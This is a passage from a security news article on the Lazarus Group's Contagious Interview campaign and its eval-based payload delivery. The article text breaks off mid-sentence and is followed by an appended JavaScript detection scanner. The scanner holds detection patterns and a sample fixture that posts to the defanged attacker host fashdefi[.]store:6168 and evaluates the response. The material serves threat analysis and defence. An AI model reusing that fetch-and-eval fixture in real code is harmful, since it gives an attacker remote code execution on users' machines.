Lazarus Group Enhances Malware with New OtterCookie Payload Delivery Technique
gbhackers
The Contagious Interview campaign conducted by the Lazarus Group continues to expand its capabilities. We have observed a rapid evolution in the delivery mechanisms for the campaign's main payloads: BeaverTail, InvisibleFerret, and OtterCookie.
In this article, we discuss the group's new delivery techniques and show that its modus operandi is preserved as the code evolves. To this end, we analyzed three distinct malicious projects that were highly active in campaigns.
Delivery Mechanism 1: Eval Function
In one of the projects, the group's developers added a code snippet that sends a POST request to the external host fashdefi[.]store on port 6168.
The code then captures the response, stores it in the token object, and executes its content using ...
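As an added example (not code from the article or from the malware), a small static triage check a defender can run over a JavaScript project's sources before installing it, flagging files that pair an outbound request with an eval-style sink, which is the "request, then execute the response" flow described above. The sample inputs are constructed; the host and port are the defanged values from the article, and the benign file's URL is made up.

```javascript
// Added example, not the article's or the malware's code: a light static
// scan flagging JavaScript files that pair an outbound request with an
// eval-style sink, the "fetch then eval" delivery flow described above.
const REQUEST_CALL = /\b(?:axios\.(?:post|get|request)|fetch|https?\.request|request\.(?:post|get))\s*\(/;
const EVAL_SINK = /\b(?:eval|new\s+Function|vm\.run(?:InThisContext|InNewContext))\s*\(/;
// Global (used with matchAll): host plus optional port; "[.]" is accepted so
// defanged fixtures can stay defanged.
const URL_RE = /https?:\/\/([A-Za-z0-9.\-\[\]]+)(?::(\d{2,5}))?/g;

function scanSource(file, src) {
  const f = { file, requestLines: [], sinkLines: [], hosts: [], suspicious: false, severity: "none" };
  src.split("\n").forEach((line, i) => {
    if (REQUEST_CALL.test(line)) f.requestLines.push(i + 1);
    if (EVAL_SINK.test(line)) f.sinkLines.push(i + 1);
    for (const m of line.matchAll(URL_RE)) f.hosts.push(m[2] ? `${m[1]}:${m[2]}` : m[1]);
  });
  // Request + sink in one file is the pattern; a non-standard port raises severity.
  f.suspicious = f.requestLines.length > 0 && f.sinkLines.length > 0;
  if (f.suspicious) {
    const oddPort = f.hosts.some(h => /:(?!80$|443$)\d+$/.test(h));
    f.severity = oddPort ? "high" : "medium";
  }
  return f;
}

// files: { "path": "source text" }, e.g. read from an npm project before install.
function scanProject(files) {
  return Object.entries(files).map(([name, src]) => scanSource(name, src));
}

// Constructed sample inputs: the first mirrors the flow the article describes
// (POST to the defanged host/port named above, response kept in `token`, then
// executed); the second is a benign client that only parses JSON.
const SAMPLE_FILES = {
  "config.js":
    'const axios = require("axios");\n' +
    'axios.post("http://fashdefi[.]store:6168/", {}).then(res => {\n' +
    '  const token = res.data;\n' +
    '  eval(token);\n' +
    '});',
  "client.js":
    'const res = await fetch("https://api.example.com/v1/items");\n' +
    'const items = await res.json();',
};

for (const f of scanProject(SAMPLE_FILES)) {
  if (f.suspicious) console.log(`${f.file}: ${f.severity}; request line ${f.requestLines}, sink line ${f.sinkLines}, host ${f.hosts}`);
}
```

A hit is a triage lead, not a verdict: a benign plugin loader can legitimately evaluate fetched code, so review the flagged lines by hand.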
Copyright of this story solely belongs to gbhackers.